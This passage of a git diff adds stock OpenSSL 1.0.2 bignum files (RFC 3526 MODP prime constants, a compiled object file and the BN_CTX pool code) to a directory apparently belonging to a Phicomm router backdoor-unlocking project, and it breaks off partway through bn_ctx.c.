+        0xF8, 0xFF, 0x94, 0x06, 0xAD, 0x9E, 0x53, 0x0E,
+        0xE5, 0xDB, 0x38, 0x2F, 0x41, 0x30, 0x01, 0xAE,
+        0xB0, 0x6A, 0x53, 0xED, 0x90, 0x27, 0xD8, 0x31,
+        0x17, 0x97, 0x27, 0xB0, 0x86, 0x5A, 0x89, 0x18,
+        0xDA, 0x3E, 0xDB, 0xEB, 0xCF, 0x9B, 0x14, 0xED,
+        0x44, 0xCE, 0x6C, 0xBA, 0xCE, 0xD4, 0xBB, 0x1B,
+        0xDB, 0x7F, 0x14, 0x47, 0xE6, 0xCC, 0x25, 0x4B,
+        0x33, 0x20, 0x51, 0x51, 0x2B, 0xD7, 0xAF, 0x42,
+        0x6F, 0xB8, 0xF4, 0x01, 0x37, 0x8C, 0xD2, 0xBF,
+        0x59, 0x83, 0xCA, 0x01, 0xC6, 0x4B, 0x92, 0xEC,
+        0xF0, 0x32, 0xEA, 0x15, 0xD1, 0x72, 0x1D, 0x03,
+        0xF4, 0x82, 0xD7, 0xCE, 0x6E, 0x74, 0xFE, 0xF6,
+        0xD5, 0x5E, 0x70, 0x2F, 0x46, 0x98, 0x0C, 0x82,
+        0xB5, 0xA8, 0x40, 0x31, 0x90, 0x0B, 0x1C, 0x9E,
+        0x59, 0xE7, 0xC9, 0x7F, 0xBE, 0xC7, 0xE8, 0xF3,
+        0x23, 0xA9, 0x7A, 0x7E, 0x36, 0xCC, 0x88, 0xBE,
+        0x0F, 0x1D, 0x45, 0xB7, 0xFF, 0x58, 0x5A, 0xC5,
+        0x4B, 0xD4, 0x07, 0xB2, 0x2B, 0x41, 0x54, 0xAA,
+        0xCC, 0x8F, 0x6D, 0x7E, 0xBF, 0x48, 0xE1, 0xD8,
+        0x14, 0xCC, 0x5E, 0xD2, 0x0F, 0x80, 0x37, 0xE0,
+        0xA7, 0x97, 0x15, 0xEE, 0xF2, 0x9B, 0xE3, 0x28,
+        0x06, 0xA1, 0xD5, 0x8B, 0xB7, 0xC5, 0xDA, 0x76,
+        0xF5, 0x50, 0xAA, 0x3D, 0x8A, 0x1F, 0xBF, 0xF0,
+        0xEB, 0x19, 0xCC, 0xB1, 0xA3, 0x13, 0xD5, 0x5C,
+        0xDA, 0x56, 0xC9, 0xEC, 0x2E, 0xF2, 0x96, 0x32,
+        0x38, 0x7F, 0xE8, 0xD7, 0x6E, 0x3C, 0x04, 0x68,
+        0x04, 0x3E, 0x8F, 0x66, 0x3F, 0x48, 0x60, 0xEE,
+        0x12, 0xBF, 0x2D, 0x5B, 0x0B, 0x74, 0x74, 0xD6,
+        0xE6, 0x94, 0xF9, 0x1E, 0x6D, 0xCC, 0x40, 0x24,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+    };
+    return BN_bin2bn(RFC3526_PRIME_6144, sizeof(RFC3526_PRIME_6144), bn);
+}
+
+/*-
+ * "8192-bit MODP Group" from RFC3526, Section 7.
+ *
+ * The prime is: 2^8192 - 2^8128 - 1 + 2^64 * { [2^8062 pi] + 4743158 }
+ *
+ * RFC3526 specifies a generator of 2.
+ */
+
+BIGNUM *get_rfc3526_prime_8192(BIGNUM *bn)
+{
+    static const unsigned char RFC3526_PRIME_8192[] = {
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+        0xC9, 0x0F, 0xDA, 0xA2, 0x21, 0x68, 0xC2, 0x34,
+        0xC4, 0xC6, 0x62, 0x8B, 0x80, 0xDC, 0x1C, 0xD1,
+        0x29, 0x02, 0x4E, 0x08, 0x8A, 0x67, 0xCC, 0x74,
+        0x02, 0x0B, 0xBE, 0xA6, 0x3B, 0x13, 0x9B, 0x22,
+        0x51, 0x4A, 0x08, 0x79, 0x8E, 0x34, 0x04, 0xDD,
+        0xEF, 0x95, 0x19, 0xB3, 0xCD, 0x3A, 0x43, 0x1B,
+        0x30, 0x2B, 0x0A, 0x6D, 0xF2, 0x5F, 0x14, 0x37,
+        0x4F, 0xE1, 0x35, 0x6D, 0x6D, 0x51, 0xC2, 0x45,
+        0xE4, 0x85, 0xB5, 0x76, 0x62, 0x5E, 0x7E, 0xC6,
+        0xF4, 0x4C, 0x42, 0xE9, 0xA6, 0x37, 0xED, 0x6B,
+        0x0B, 0xFF, 0x5C, 0xB6, 0xF4, 0x06, 0xB7, 0xED,
+        0xEE, 0x38, 0x6B, 0xFB, 0x5A, 0x89, 0x9F, 0xA5,
+        0xAE, 0x9F, 0x24, 0x11, 0x7C, 0x4B, 0x1F, 0xE6,
+        0x49, 0x28, 0x66, 0x51, 0xEC, 0xE4, 0x5B, 0x3D,
+        0xC2, 0x00, 0x7C, 0xB8, 0xA1, 0x63, 0xBF, 0x05,
+        0x98, 0xDA, 0x48, 0x36, 0x1C, 0x55, 0xD3, 0x9A,
+        0x69, 0x16, 0x3F, 0xA8, 0xFD, 0x24, 0xCF, 0x5F,
+        0x83, 0x65, 0x5D, 0x23, 0xDC, 0xA3, 0xAD, 0x96,
+        0x1C, 0x62, 0xF3, 0x56, 0x20, 0x85, 0x52, 0xBB,
+        0x9E, 0xD5, 0x29, 0x07, 0x70, 0x96, 0x96, 0x6D,
+        0x67, 0x0C, 0x35, 0x4E, 0x4A, 0xBC, 0x98, 0x04,
+        0xF1, 0x74, 0x6C, 0x08, 0xCA, 0x18, 0x21, 0x7C,
+        0x32, 0x90, 0x5E, 0x46, 0x2E, 0x36, 0xCE, 0x3B,
+        0xE3, 0x9E, 0x77, 0x2C, 0x18, 0x0E, 0x86, 0x03,
+        0x9B, 0x27, 0x83, 0xA2, 0xEC, 0x07, 0xA2, 0x8F,
+        0xB5, 0xC5, 0x5D, 0xF0, 0x6F, 0x4C, 0x52, 0xC9,
+        0xDE, 0x2B, 0xCB, 0xF6, 0x95, 0x58, 0x17, 0x18,
+        0x39, 0x95, 0x49, 0x7C, 0xEA, 0x95, 0x6A, 0xE5,
+        0x15, 0xD2, 0x26, 0x18, 0x98, 0xFA, 0x05, 0x10,
+        0x15, 0x72, 0x8E, 0x5A, 0x8A, 0xAA, 0xC4, 0x2D,
+        0xAD, 0x33, 0x17, 0x0D, 0x04, 0x50, 0x7A, 0x33,
+        0xA8, 0x55, 0x21, 0xAB, 0xDF, 0x1C, 0xBA, 0x64,
+        0xEC, 0xFB, 0x85, 0x04, 0x58, 0xDB, 0xEF, 0x0A,
+        0x8A, 0xEA, 0x71, 0x57, 0x5D, 0x06, 0x0C, 0x7D,
+        0xB3, 0x97, 0x0F, 0x85, 0xA6, 0xE1, 0xE4, 0xC7,
+        0xAB, 0xF5, 0xAE, 0x8C, 0xDB, 0x09, 0x33, 0xD7,
+        0x1E, 0x8C, 0x94, 0xE0, 0x4A, 0x25, 0x61, 0x9D,
+        0xCE, 0xE3, 0xD2, 0x26, 0x1A, 0xD2, 0xEE, 0x6B,
+        0xF1, 0x2F, 0xFA, 0x06, 0xD9, 0x8A, 0x08, 0x64,
+        0xD8, 0x76, 0x02, 0x73, 0x3E, 0xC8, 0x6A, 0x64,
+        0x52, 0x1F, 0x2B, 0x18, 0x17, 0x7B, 0x20, 0x0C,
+        0xBB, 0xE1, 0x17, 0x57, 0x7A, 0x61, 0x5D, 0x6C,
+        0x77, 0x09, 0x88, 0xC0, 0xBA, 0xD9, 0x46, 0xE2,
+        0x08, 0xE2, 0x4F, 0xA0, 0x74, 0xE5, 0xAB, 0x31,
+        0x43, 0xDB, 0x5B, 0xFC, 0xE0, 0xFD, 0x10, 0x8E,
+        0x4B, 0x82, 0xD1, 0x20, 0xA9, 0x21, 0x08, 0x01,
+        0x1A, 0x72, 0x3C, 0x12, 0xA7, 0x87, 0xE6, 0xD7,
+        0x88, 0x71, 0x9A, 0x10, 0xBD, 0xBA, 0x5B, 0x26,
+        0x99, 0xC3, 0x27, 0x18, 0x6A, 0xF4, 0xE2, 0x3C,
+        0x1A, 0x94, 0x68, 0x34, 0xB6, 0x15, 0x0B, 0xDA,
+        0x25, 0x83, 0xE9, 0xCA, 0x2A, 0xD4, 0x4C, 0xE8,
+        0xDB, 0xBB, 0xC2, 0xDB, 0x04, 0xDE, 0x8E, 0xF9,
+        0x2E, 0x8E, 0xFC, 0x14, 0x1F, 0xBE, 0xCA, 0xA6,
+        0x28, 0x7C, 0x59, 0x47, 0x4E, 0x6B, 0xC0, 0x5D,
+        0x99, 0xB2, 0x96, 0x4F, 0xA0, 0x90, 0xC3, 0xA2,
+        0x23, 0x3B, 0xA1, 0x86, 0x51, 0x5B, 0xE7, 0xED,
+        0x1F, 0x61, 0x29, 0x70, 0xCE, 0xE2, 0xD7, 0xAF,
+        0xB8, 0x1B, 0xDD, 0x76, 0x21, 0x70, 0x48, 0x1C,
+        0xD0, 0x06, 0x91, 0x27, 0xD5, 0xB0, 0x5A, 0xA9,
+        0x93, 0xB4, 0xEA, 0x98, 0x8D, 0x8F, 0xDD, 0xC1,
+        0x86, 0xFF, 0xB7, 0xDC, 0x90, 0xA6, 0xC0, 0x8F,
+        0x4D, 0xF4, 0x35, 0xC9, 0x34, 0x02, 0x84, 0x92,
+        0x36, 0xC3, 0xFA, 0xB4, 0xD2, 0x7C, 0x70, 0x26,
+        0xC1, 0xD4, 0xDC, 0xB2, 0x60, 0x26, 0x46, 0xDE,
+        0xC9, 0x75, 0x1E, 0x76, 0x3D, 0xBA, 0x37, 0xBD,
+        0xF8, 0xFF, 0x94, 0x06, 0xAD, 0x9E, 0x53, 0x0E,
+        0xE5, 0xDB, 0x38, 0x2F, 0x41, 0x30, 0x01, 0xAE,
+        0xB0, 0x6A, 0x53, 0xED, 0x90, 0x27, 0xD8, 0x31,
+        0x17, 0x97, 0x27, 0xB0, 0x86, 0x5A, 0x89, 0x18,
+        0xDA, 0x3E, 0xDB, 0xEB, 0xCF, 0x9B, 0x14, 0xED,
+        0x44, 0xCE, 0x6C, 0xBA, 0xCE, 0xD4, 0xBB, 0x1B,
+        0xDB, 0x7F, 0x14, 0x47, 0xE6, 0xCC, 0x25, 0x4B,
+        0x33, 0x20, 0x51, 0x51, 0x2B, 0xD7, 0xAF, 0x42,
+        0x6F, 0xB8, 0xF4, 0x01, 0x37, 0x8C, 0xD2, 0xBF,
+        0x59, 0x83, 0xCA, 0x01, 0xC6, 0x4B, 0x92, 0xEC,
+        0xF0, 0x32, 0xEA, 0x15, 0xD1, 0x72, 0x1D, 0x03,
+        0xF4, 0x82, 0xD7, 0xCE, 0x6E, 0x74, 0xFE, 0xF6,
+        0xD5, 0x5E, 0x70, 0x2F, 0x46, 0x98, 0x0C, 0x82,
+        0xB5, 0xA8, 0x40, 0x31, 0x90, 0x0B, 0x1C, 0x9E,
+        0x59, 0xE7, 0xC9, 0x7F, 0xBE, 0xC7, 0xE8, 0xF3,
+        0x23, 0xA9, 0x7A, 0x7E, 0x36, 0xCC, 0x88, 0xBE,
+        0x0F, 0x1D, 0x45, 0xB7, 0xFF, 0x58, 0x5A, 0xC5,
+        0x4B, 0xD4, 0x07, 0xB2, 0x2B, 0x41, 0x54, 0xAA,
+        0xCC, 0x8F, 0x6D, 0x7E, 0xBF, 0x48, 0xE1, 0xD8,
+        0x14, 0xCC, 0x5E, 0xD2, 0x0F, 0x80, 0x37, 0xE0,
+        0xA7, 0x97, 0x15, 0xEE, 0xF2, 0x9B, 0xE3, 0x28,
+        0x06, 0xA1, 0xD5, 0x8B, 0xB7, 0xC5, 0xDA, 0x76,
+        0xF5, 0x50, 0xAA, 0x3D, 0x8A, 0x1F, 0xBF, 0xF0,
+        0xEB, 0x19, 0xCC, 0xB1, 0xA3, 0x13, 0xD5, 0x5C,
+        0xDA, 0x56, 0xC9, 0xEC, 0x2E, 0xF2, 0x96, 0x32,
+        0x38, 0x7F, 0xE8, 0xD7, 0x6E, 0x3C, 0x04, 0x68,
+        0x04, 0x3E, 0x8F, 0x66, 0x3F, 0x48, 0x60, 0xEE,
+        0x12, 0xBF, 0x2D, 0x5B, 0x0B, 0x74, 0x74, 0xD6,
+        0xE6, 0x94, 0xF9, 0x1E, 0x6D, 0xBE, 0x11, 0x59,
+        0x74, 0xA3, 0x92, 0x6F, 0x12, 0xFE, 0xE5, 0xE4,
+        0x38, 0x77, 0x7C, 0xB6, 0xA9, 0x32, 0xDF, 0x8C,
+        0xD8, 0xBE, 0xC4, 0xD0, 0x73, 0xB9, 0x31, 0xBA,
+        0x3B, 0xC8, 0x32, 0xB6, 0x8D, 0x9D, 0xD3, 0x00,
+        0x74, 0x1F, 0xA7, 0xBF, 0x8A, 0xFC, 0x47, 0xED,
+        0x25, 0x76, 0xF6, 0x93, 0x6B, 0xA4, 0x24, 0x66,
+        0x3A, 0xAB, 0x63, 0x9C, 0x5A, 0xE4, 0xF5, 0x68,
+        0x34, 0x23, 0xB4, 0x74, 0x2B, 0xF1, 0xC9, 0x78,
+        0x23, 0x8F, 0x16, 0xCB, 0xE3, 0x9D, 0x65, 0x2D,
+        0xE3, 0xFD, 0xB8, 0xBE, 0xFC, 0x84, 0x8A, 0xD9,
+        0x22, 0x22, 0x2E, 0x04, 0xA4, 0x03, 0x7C, 0x07,
+        0x13, 0xEB, 0x57, 0xA8, 0x1A, 0x23, 0xF0, 0xC7,
+        0x34, 0x73, 0xFC, 0x64, 0x6C, 0xEA, 0x30, 0x6B,
+        0x4B, 0xCB, 0xC8, 0x86, 0x2F, 0x83, 0x85, 0xDD,
+        0xFA, 0x9D, 0x4B, 0x7F, 0xA2, 0xC0, 0x87, 0xE8,
+        0x79, 0x68, 0x33, 0x03, 0xED, 0x5B, 0xDD, 0x3A,
+        0x06, 0x2B, 0x3C, 0xF5, 0xB3, 0xA2, 0x78, 0xA6,
+        0x6D, 0x2A, 0x13, 0xF8, 0x3F, 0x44, 0xF8, 0x2D,
+        0xDF, 0x31, 0x0E, 0xE0, 0x74, 0xAB, 0x6A, 0x36,
+        0x45, 0x97, 0xE8, 0x99, 0xA0, 0x25, 0x5D, 0xC1,
+        0x64, 0xF3, 0x1C, 0xC5, 0x08, 0x46, 0x85, 0x1D,
+        0xF9, 0xAB, 0x48, 0x19, 0x5D, 0xED, 0x7E, 0xA1,
+        0xB1, 0xD5, 0x10, 0xBD, 0x7E, 0xE7, 0x4D, 0x73,
+        0xFA, 0xF3, 0x6B, 0xC3, 0x1E, 0xCF, 0xA2, 0x68,
+        0x35, 0x90, 0x46, 0xF4, 0xEB, 0x87, 0x9F, 0x92,
+        0x40, 0x09, 0x43, 0x8B, 0x48, 0x1C, 0x6C, 0xD7,
+        0x88, 0x9A, 0x00, 0x2E, 0xD5, 0xEE, 0x38, 0x2B,
+        0xC9, 0x19, 0x0D, 0xA6, 0xFC, 0x02, 0x6E, 0x47,
+        0x95, 0x58, 0xE4, 0x47, 0x56, 0x77, 0xE9, 0xAA,
+        0x9E, 0x30, 0x50, 0xE2, 0x76, 0x56, 0x94, 0xDF,
+        0xC8, 0x1F, 0x56, 0xE8, 0x80, 0xB9, 0x6E, 0x71,
+        0x60, 0xC9, 0x80, 0xDD, 0x98, 0xED, 0xD3, 0xDF,
+        0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
+    };
+    return BN_bin2bn(RFC3526_PRIME_8192, sizeof(RFC3526_PRIME_8192), bn);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_const.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_const.o
new file mode 100644
index 0000000000000000000000000000000000000000..516bf9896419c7d876b5d38ac3a191096e568553
GIT binary patch
literal 6568
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
DVXO7p

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_ctx.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_ctx.c
new file mode 100644
index 0000000..526c6a0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_ctx.c
@@ -0,0 +1,448 @@
+/* crypto/bn/bn_ctx.c */
+/* Written by Ulf Moeller for the OpenSSL project. */
+/* ====================================================================
+ * Copyright (c) 1998-2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#if !defined(BN_CTX_DEBUG) && !defined(BN_DEBUG)
+# ifndef NDEBUG
+#  define NDEBUG
+# endif
+#endif
+
+#include <stdio.h>
+#include <assert.h>
+
+#include "cryptlib.h"
+#include "bn_lcl.h"
+
+/*-
+ * TODO list
+ *
+ * 1. Check a bunch of "(words+1)" type hacks in various bignum functions and
+ * check they can be safely removed.
+ *  - Check +1 and other ugliness in BN_from_montgomery()
+ *
+ * 2. Consider allowing a BN_new_ex() that, at least, lets you specify an
+ * appropriate 'block' size that will be honoured by bn_expand_internal() to
+ * prevent piddly little reallocations. OTOH, profiling bignum expansions in
+ * BN_CTX doesn't show this to be a big issue.
+ */
+
+/* How many bignums are in each "pool item"; */
+#define BN_CTX_POOL_SIZE        16
+/* The stack frame info is resizing, set a first-time expansion size; */
+#define BN_CTX_START_FRAMES     32
+
+/***********/
+/* BN_POOL */
+/***********/
+
+/* A bundle of bignums that can be linked with other bundles */
+typedef struct bignum_pool_item {
+    /* The bignum values */
+    BIGNUM vals[BN_CTX_POOL_SIZE];
+    /* Linked-list admin */
+    struct bignum_pool_item *prev, *next;
+} BN_POOL_ITEM;
+/* A linked-list of bignums grouped in bundles */
+typedef struct bignum_pool {
+    /* Linked-list admin */
+    BN_POOL_ITEM *head, *current, *tail;
+    /* Stack depth and allocation size */
+    unsigned used, size;
+} BN_POOL;
+static void BN_POOL_init(BN_POOL *);
+static void BN_POOL_finish(BN_POOL *);
+#ifndef OPENSSL_NO_DEPRECATED
+static void BN_POOL_reset(BN_POOL *);
+#endif
+static BIGNUM *BN_POOL_get(BN_POOL *);
+static void BN_POOL_release(BN_POOL *, unsigned int);
+
+/************/
+/* BN_STACK */
+/************/
+
+/* A wrapper to manage the "stack frames" */
+typedef struct bignum_ctx_stack {
+    /* Array of indexes into the bignum stack */
+    unsigned int *indexes;
+    /* Number of stack frames, and the size of the allocated array */
+    unsigned int depth, size;
+} BN_STACK;
+static void BN_STACK_init(BN_STACK *);
+static void BN_STACK_finish(BN_STACK *);
+#ifndef OPENSSL_NO_DEPRECATED
+static void BN_STACK_reset(BN_STACK *);
+#endif
+static int BN_STACK_push(BN_STACK *, unsigned int);
+static unsigned int BN_STACK_pop(BN_STACK *);
+
+/**********/
+/* BN_CTX */
+/**********/
+
+/* The opaque BN_CTX type */
+struct bignum_ctx {
+    /* The bignum bundles */
+    BN_POOL pool;
+    /* The "stack frames", if you will */
+    BN_STACK stack;
+    /* The number of bignums currently assigned */
+    unsigned int used;
+    /* Depth of stack overflow */
+    int err_stack;
+    /* Block "gets" until an "end" (compatibility behaviour) */
+    int too_many;
+};
+
+/* Enable this to find BN_CTX bugs */
+#ifdef BN_CTX_DEBUG
+static const char *ctxdbg_cur = NULL;
+static void ctxdbg(BN_CTX *ctx)
+{
+    unsigned int bnidx = 0, fpidx = 0;
+    BN_POOL_ITEM *item = ctx->pool.head;
+    BN_STACK *stack = &ctx->stack;
+    fprintf(stderr, "(%16p): ", ctx);
+    while (bnidx < ctx->used) {
+        fprintf(stderr, "%03x ", item->vals[bnidx++ % BN_CTX_POOL_SIZE].dmax);
+        if (!(bnidx % BN_CTX_POOL_SIZE))
+            item = item->next;
+    }
+    fprintf(stderr, "\n");
+    bnidx = 0;
+    fprintf(stderr, "          : ");
+    while (fpidx < stack->depth) {
+        while (bnidx++ < stack->indexes[fpidx])
+            fprintf(stderr, "    ");
+        fprintf(stderr, "^^^ ");
+        bnidx++;
+        fpidx++;
+    }
+    fprintf(stderr, "\n");
+}
+
+# define CTXDBG_ENTRY(str, ctx)  do { \
+                                ctxdbg_cur = (str); \
+                                fprintf(stderr,"Starting %s\n", ctxdbg_cur); \
+                                ctxdbg(ctx); \
+                                } while(0)
+# define CTXDBG_EXIT(ctx)        do { \
+                                fprintf(stderr,"Ending %s\n", ctxdbg_cur); \
+                                ctxdbg(ctx); \
+                                } while(0)
+# define CTXDBG_RET(ctx,ret)
+#else
+# define CTXDBG_ENTRY(str, ctx)
+# define CTXDBG_EXIT(ctx)
+# define CTXDBG_RET(ctx,ret)
+#endif
+
+/*
+ * This function is an evil legacy and should not be used. This
+ * implementation is WYSIWYG, though I've done my best.
+ */
+#ifndef OPENSSL_NO_DEPRECATED
+void BN_CTX_init(BN_CTX *ctx)
+{
+    /*
+     * Assume the caller obtained the context via BN_CTX_new() and so is
+     * trying to reset it for use. Nothing else makes sense, least of all
+     * binary compatibility from a time when they could declare a static
+     * variable.
+     */
+    BN_POOL_reset(&ctx->pool);
+    BN_STACK_reset(&ctx->stack);
+    ctx->used = 0;
+    ctx->err_stack = 0;
+    ctx->too_many = 0;
+}
+#endif
+
+BN_CTX *BN_CTX_new(void)
+{
+    BN_CTX *ret = OPENSSL_malloc(sizeof(BN_CTX));
+    if (!ret) {
+        BNerr(BN_F_BN_CTX_NEW, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    /* Initialise the structure */
+    BN_POOL_init(&ret->pool);
+    BN_STACK_init(&ret->stack);
+    ret->used = 0;
+    ret->err_stack = 0;
+    ret->too_many = 0;
+    return ret;
+}
+
+void BN_CTX_free(BN_CTX *ctx)
+{
+    if (ctx == NULL)
+        return;
+#ifdef BN_CTX_DEBUG
+    {
+        BN_POOL_ITEM *pool = ctx->pool.head;
+        fprintf(stderr, "BN_CTX_free, stack-size=%d, pool-bignums=%d\n",
+                ctx->stack.size, ctx->pool.size);
+        fprintf(stderr, "dmaxs: ");
+        while (pool) {
+            unsigned loop = 0;
+            while (loop < BN_CTX_POOL_SIZE)
+                fprintf(stderr, "%02x ", pool->vals[loop++].dmax);
